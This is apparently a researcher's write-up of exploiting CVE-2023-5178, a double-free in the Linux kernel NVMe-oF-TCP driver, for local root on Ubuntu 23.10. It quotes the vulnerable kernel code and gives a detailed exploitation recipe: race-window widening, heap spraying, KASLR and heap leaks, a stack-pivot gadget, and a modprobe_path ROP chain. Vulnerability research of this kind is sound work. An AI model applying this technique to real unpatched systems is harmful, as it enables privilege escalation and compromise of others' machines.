CVE-2023-5178: exploiting Linux kernel NVMe-oF-TCP driver on Ubuntu 23.10
by rockrid3r
The NVMe-oF-TCP driver had a vulnerability found by Alon Zahavi. It leads to the racy double-free in kmalloc-96, which can be exploited to gain LPE.
The bug is a logic error during the handle of corrupted Initialize Connection Request. Let’s exploit it.
The bug
Communication in NVMe-oF-TCP happens with PDUs(Partial Data Unit). Every request to server is a PDU and every response from server is a PDU. See PDU structure at page 15 in the overview presentation.
The bug was in the function nvmet_tcp_handle_icreq
which handles the Initialize Connection Request
.
If you provide the icreq(Initialize Connection Request) with incorrect payload len (by specification the length for every icreq is fixed and is the same), then you made a “fatal error” and you connection is gotta be closed and if you used the pdu-header/data hashing (to make sure of your pdu/data integrity), the corresponding hashing objects will be feed… 2 times:
static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
{
struct nvme_tcp_icreq_pdu *icreq = &queue->pdu.icreq;
struct nvme_tcp_icresp_pdu *icresp = &queue->pdu.icresp;
struct msghdr msg = {};
struct kvec iov;
int ret;
if (le32_to_cpu(icreq->hdr.plen) != sizeof(struct nvme_tcp_icreq_pdu)) {
pr_err("bad nvme-tcp pdu length (%d)\n",
le32_to_cpu(icreq->hdr.plen));
nvmet_tcp_fatal_error(queue); // **schedules** a 2nd free
// does not return here
}
// ...
ret = kernel_sendmsg(queue->sock, &msg, &iov, 1, iov.iov_len); // err since socket is killed
if (ret < 0)
goto free_crypto;
// ...
free_crypto:
if (queue->hdr_digest || queue->data_digest)
nvmet_tcp_free_crypto(queue); // 1st free
}
The nvmet_tcp_fatal_error
kills a socket and schedules a queue release:
static void nvmet_tcp_fatal_error(struct nvmet_tcp_queue *queue)
{
queue->rcv_state = NVMET_TCP_RECV_ERR;
if (queue->nvme_sq.ctrl)
nvmet_ctrl_fatal_error(queue->nvme_sq.ctrl);
else // we go here
kernel_sock_shutdown(queue->sock, SHUT_RDWR); // triggers sk_state_change (see how below)
}
static void nvmet_tcp_state_change(struct sock *sk)
{
// ...
switch (sk->sk_state) {
// ...
case TCP_FIN_WAIT1: // we go here since the server closed connection
case TCP_CLOSE_WAIT:
case TCP_CLOSE:
/* FALLTHRU */
nvmet_tcp_schedule_release_queue(queue); // schedules the free on workqueue
break;
}
// ...
}
static void nvmet_tcp_schedule_release_queue(struct nvmet_tcp_queue *queue)
{
spin_lock(&queue->state_lock);
if (queue->state != NVMET_TCP_Q_DISCONNECTING) {
queue->state = NVMET_TCP_Q_DISCONNECTING;
queue_work(nvmet_wq, &queue->release_work);
}
spin_unlock(&queue->state_lock);
}
static void nvmet_tcp_release_queue_work(struct work_struct *w)
{
//...
if (queue->hdr_digest || queue->data_digest)
nvmet_tcp_free_crypto(queue);
//...
}
static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);
ahash_request_free(queue->rcv_hash);
ahash_request_free(queue->snd_hash);
crypto_free_ahash(tfm);
}
So the function nvmet_tcp_free_crypto
is called from both
- the “main thread” in
nvmet_tcp_handle_icreq
after failedkernel_sendmsg()
- the
nvmet_wq
worker which was triggered innvmet_tcp_schedule_release_queue
So the double-free here. Both the snd_hash
, rcv_hash
come from kmalloc-96 cache.
The double free is raced since we do not know what time it will take
before nvmet_wq
worker will start doing his queue-release job.
Exploitation
Trouble of dealing with double-free
On systems with CONFIG_SLAB_FREELIST_HARDENED
you may consider yourself done as soon as
consecutive double free happened (without reallocation between calls):
+-----------------------+ +---------------------+ +--------------------+ +--------------------+
| | | | | | | |
| Object A | | Object B | | Object A | | Object C |
| | | | | | | |
| | | | | | | |
| freelist ^ random +-------> freelist ^ random +------>+ freelist ^ random +------>+ freelist ^ random +-----> ...
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
+-----------------------+ +---------------------+ +------------^-------+ +--------------------+
^ |
| |
| |
+------------------------+the same object (double-free)+-------+
When CONFIG_SLAB_FREELIST_HARDENED
is enabled, the freelist
pointer is not stored in plaintext.
It is xor’ed with some random secret from the corresponding kmem_cache
and with something else (does not matter here).
As soon as you allocate the object A and overwrite it’s contents (and especially you overwrite the freelist
),
the freelist
becomes corrupted and you can’t do much about it since you don’t know the random secret from kmem_cache
:
+---------------------+ +--------------------+ +------------------+
| | | | | |
| Object B | | Object A | | |
| | | | | |
| | | | | Unmapped region |
| freelist ^ random +------>+ written_data +------->+ |
| | | | | |
| | | !!!!!!!!!!!!!!!! | | |
| | | | | |
| | | | | |
+---------------------+ +--------------------+ +------------------+
If you allocate 2 more objects, the kernel will crash.
So we need to realloc freed chunks before they are freed once more.
Enlarging race window
As we understand, the double-free is racy and the window between 2 free calls is very tight. Remainder:
- 1st free happens in “main thread”
- 2nd free is performed by
nvmet_wq
worker as soon as it feels to do it.
As we discussed above, we can’t let double-free happen without reallocation in between: system will crash.
The solution is simple: we need to make nvmet_wq
worker busy.
Then we will have some time to reallocate the freed chunks before they will be freed again.
Let’s look at how the queue is created.
There is a loop called nvmet_tcp_accept_work
, which accept
s connection and creates a corresponding queue.
The problem is that it creates a new queue for every TCP connection:
static void nvmet_tcp_accept_work(struct work_struct *w)
{
struct nvmet_tcp_port *port =
container_of(w, struct nvmet_tcp_port, accept_work);
struct socket *newsock;
int ret;
while (true) {
ret = kernel_accept(port->sock, &newsock, O_NONBLOCK); // here is accept()
if (ret < 0) {
if (ret != -EAGAIN)
pr_warn("failed to accept err=%d\n", ret);
return;
}
ret = nvmet_tcp_alloc_queue(port, newsock); // allocates queue!
if (ret) {
pr_err("failed to allocate queue\n");
sock_release(newsock);
}
}
}
static int nvmet_tcp_alloc_queue(struct nvmet_tcp_port *port,
struct socket *newsock)
{
struct nvmet_tcp_queue *queue;
int ret;
queue = kzalloc(sizeof(*queue), GFP_KERNEL);
if (!queue)
return -ENOMEM;
INIT_WORK(&queue->release_work, nvmet_tcp_release_queue_work); // exactly what is needed
// ...
ret = nvmet_tcp_set_queue_sock(queue); // sets up sk_state_change for socket.
// ...
}
static int nvmet_tcp_set_queue_sock(struct nvmet_tcp_queue *queue)
{
struct socket *sock = queue->sock;
// ...
if (sock->sk->sk_state != TCP_ESTABLISHED) {
/*
* If the socket is already closing, don't even start
* consuming it
*/
ret = -ENOTCONN;
} else {
// ...
queue->state_change = sock->sk->sk_state_change;
sock->sk->sk_state_change = nvmet_tcp_state_change;
// ...
}
write_unlock_bh(&sock->sk->sk_callback_lock);
return ret;
}
static void nvmet_tcp_state_change(struct sock *sk)
{
//...
switch (sk->sk_state) {
//...
case TCP_CLOSE_WAIT: // client closed connection
case TCP_CLOSE:
/* FALLTHRU */
nvmet_tcp_schedule_release_queue(queue); // schedules a worker job
break;
//...
}
//...
}
It means that if we create a TCP connection and then close it, the kernel will schedule a worker job responsible for cleaning up the allocated queue.
Let’s create a lot of such “dummy” connections, and then close all of them.
It will populate our nvmet_wq
workqueue with dummy jobs.
And if we trigger double-free now (by sending a wrong icreq), the kernel will not cause corrupted freelist rightaway: the nvmet_wq
worker has a lot of jobs to do before the 2nd free. So we have some time to realloc the freed chunks after the 1st free. The same object will not get twice inside the same freelist.
Reallocation strategy
Our target objects are in kmalloc-96
cache, so I’ve chosen the setxattr + fuse
spray.
The idea is to realloc the freed objects after the 1st free and then realloc them again after the 2nd. After this we will have a controllable use-after-free in kmalloc-96.
nvmet_tcp_alloc_crypto
allocatessnd_hash
,rcv_hash
- 1st free of both
snd_hash
,rcv_hash
- reallocate objects.
- 2nd free of both
snd_hash
,rcv_hash
- reallocate objects.
We will mark every xattr
with it’s index in spray, like this:
*(uint64_t*)&xattr_i[0] = i
So all but 2 xattrs will have *(uint64_t*)&xattr_i[0] == i
.
Those 2 xattrs (which reallocated snd_hash
, rcv_hash
after the 1st free)
will have the *(uint64_t*)&xattr_i[0] != i
.
Moreover, values written in them will correspond to xattrs
which reallocated the snd_hash
, rcv_hash
after the 2nd free.
In exploit, I call those values tag[0], tag[1]
.
In order to check the value of xattr_i
we need to release it. It will trigger the free on the object. If the value written in xattr_i
does not equal to i
,
it means we found the corrupted object and we need to realloc it ASAP
so that somebody else doesn’t take our object.
Freeing a tag[0]
or tag[1]
will trigger the UAF(and content leak, see below) on
whatever kmalloc-96 object they were overlapped with.
Hijacking control flow
We are going to hijack control flow with crypto_tfm
object. Consider the struct ahash_request
:
struct ahash_request {
struct crypto_async_request base;
unsigned int nbytes;
struct scatterlist * src;
u8 * result;
void * priv;
void * __ctx[];
};
(dumped with pahole)
struct crypto_async_request {
struct list_head list;
crypto_completion_t complete;
void * data;
struct crypto_tfm * tfm; // target pointer
u32 flags;
};
In function nvmet_tcp_free_crypto
this rcv_hash.base.tfm
pointer is converted into the crypto_ahash
(with container_of
macro) object from kmalloc-128:
struct crypto_tfm {
refcount_t refcnt;
u32 crt_flags;
int node;
void (*exit)(struct crypto_tfm *tfm);
struct crypto_alg *__crt_alg;
void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
// size: 32
};
struct crypto_ahash {
int (*init)(struct ahash_request *);
int (*update)(struct ahash_request *);
int (*final)(struct ahash_request *);
int (*finup)(struct ahash_request *);
int (*digest)(struct ahash_request *);
int (*export)(struct ahash_request *, void *);
int (*import)(struct ahash_request *, const void *);
int (*setkey)(struct crypto_ahash *, const u8 *, unsigned int);
unsigned int reqsize;
struct crypto_tfm base;
};
+--------------------+
| struct |
| crypto_ahash |
| |
| |
+-------------------------+ | |
| struct ahash_request | | |
| (rcv_hash) | | |
| | | |
| | | |
+-------------------------+ | |
| tfm +------>+--------------------+
+-------------------------+ | |
| | | |
| | | |
| | | |
| | | embedded |
| | | struct crypto_tfm |
+-------------------------+ | |
| |
| |
| |
| |
+--------------------+
Let’s see how free proceeds:
static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);
ahash_request_free(queue->rcv_hash);
ahash_request_free(queue->snd_hash);
crypto_free_ahash(tfm); // convertation is here
}
After convertation the function crypto_destroy_tfm
is called
with args mem=crypto_ahash
, tfm=crypto_ahash.base
:
void crypto_destroy_tfm(void *mem, struct crypto_tfm *tfm)
{
struct crypto_alg *alg;
if (IS_ERR_OR_NULL(mem))
return;
if (!refcount_dec_and_test(&tfm->refcnt))
return;
alg = tfm->__crt_alg;
if (!tfm->exit && alg->cra_exit)
alg->cra_exit(tfm);
crypto_exit_ops(tfm); // goes here
crypto_mod_put(alg);
kfree_sensitive(mem);
}
static void crypto_exit_ops(struct crypto_tfm *tfm)
{
const struct crypto_type *type = tfm->__crt_alg->cra_type;
if (type && tfm->exit)
tfm->exit(tfm); // here we go
}
Corrupting the tfm.exit
will lead to hijacking control flow.
We don’t have a direct access to tfm
object, but we can overwrite the rcv_hash
(struct ahash_request
).
We will overwrite the rcv_hash.tfm
to the address that we do control and then perform ROP.
Leaks
So we basically want 2 things:
- kmalloc-128+ pointer to store both our rop and crypto_tfm object.
- kernel text pointer to bypass KASLR
Bypassing KASLR
Bypassing KASLR object was pretty straightforward.
I’ve chosen the struct squashfs_page_actor
for pointer leak:
struct squashfs_page_actor {
union {
void **buffer;
struct page **page;
};
void *pageaddr;
void *tmp_buffer;
void *(*squashfs_first_page)(struct squashfs_page_actor *);
void *(*squashfs_next_page)(struct squashfs_page_actor *);
void (*squashfs_finish_page)(struct squashfs_page_actor *);
struct page *last_page;
int pages;
int length;
int next_page;
int alloc_buffer;
int returned_pages;
pgoff_t next_index;
};
It resides in kmalloc-96, has kernel pointers at .squashfs_*_page
member,
and we probably can even corrupt it to hijack control flow, but I decided to not go there,
only leak kernel pointers and stay with NVMe primitives instead.
Leaking kmalloc-128
As we recall the rcv_hash.tfm
contains the pointer inside the kmalloc-128 object(at offset 72).
Leaking it will give us the needed heap leak.
Arbitrary free
The key here is again the .tfm
member of rcv_hash
(snd_hash
won’t work).
The .tfm
is extracted from rcv_hash
,
then the pointer is converted to the base object holding it,
the struct crypto_ahash
(kmalloc-128), and then this struct crypto_ahash
is freed.
So corrupting the .tfm
of rcv_hash
will result in arbitrary free.
Reusing tfm to store ROP reliably
Imagine we have 2 rcv_hash
objects: rcv_hash1
, rcv_hash2
.
We learned that we can leak a rcv_hash1.base.tfm
pointer (kmalloc-128).
Let’s use our leaked .tfm
(call it leaked_tfm
) pointer fromrcv_hash1
and set the rcv_hash2.base.tfm=leaked_tfm
.
So closing the 1st connection frees the leaked_tfm
pointer and
causes the rcv_hash2.base.tfm
to be a dangling pointer.
Reallocating leaked_tfm
with both ROP-chain and corrupted crypto_tfm
provides a comfortable stack pivoting (see below).
+------------+
| |<------+
| ROP | |
| | | stack pivot
+------------+ |
| crypto_tfm |-------+
+------------+
ROP
The r12
register contains the pointer to the top of crypto_ahash
(which we will control).
Other register did not contain anything useful.
Stack pivot
So the r12
pointer contains the top address of crypto_ahash
object which holds the crypto_tfm
at +72
offset.
Placing ropchain at the top of crypto_ahash
makes the pivoting straightforward
with this gadget:
0xffffffff81c15e22 : push r12 ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; xor edx, edx ; xor esi, esi ; xor edi, edi ; jmp 0xffffffff8215ad10
It basically made my day. After executing it, the rsp
points to the top of crypto_ahash
and we have 72/8=9
qwords to perform rop.
ROP-chain
I’ve chosen to overwrite of modprobe_path
and then msleep(-1)
.
See full exploit code here.
Backporting to Linux Kernel v5.
Let’s discuss exploitation of the bug in Linux Kernel v5.
As we can see, the struct crypto_tfm
now
does not have
the refcnt
member:
struct crypto_tfm {
u32 crt_flags;
int node;
void (*exit)(struct crypto_tfm *tfm);
struct crypto_alg *__crt_alg;
void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
};
The crypto_tfm
is part of crypto_ahash
object, located at it’s footer.
In kernel v6 the total size of crypto_ahash
was 104 (because of refcnt
member of crypto_tfm
structure),
so the object is moved into kmalloc-128.
(Simple exercise for reader to check it out).
But in v5, the crypto_tfm
does not have the refcnt
member, so the crypto_ahash
object is stored into kmalloc-96.
It means that the .tfm
pointer in rcv_hash
now points into the kmalloc-96
object.
Moreover, it is allocated every time the rcv_hash
is allocated (in ) and freed every time `rcv_hash`
is freed (in
).
So now we have double-free on triplet of objects: snd_hash
, rcv_hash
, and rcv_hash.tfm
!
It means that by using the same fuse+setxattr
spray we now own the contents of rcv_hash.tfm
, which is
a huge advantage for exploitation. In v6 in order to hijack control flow
we had to corrupt the .tfm
pointer in rcv_hash
to the known location because we was not
in control of it’s content; now we don’t have to AND we have a control of it’s content.
Happy pwning!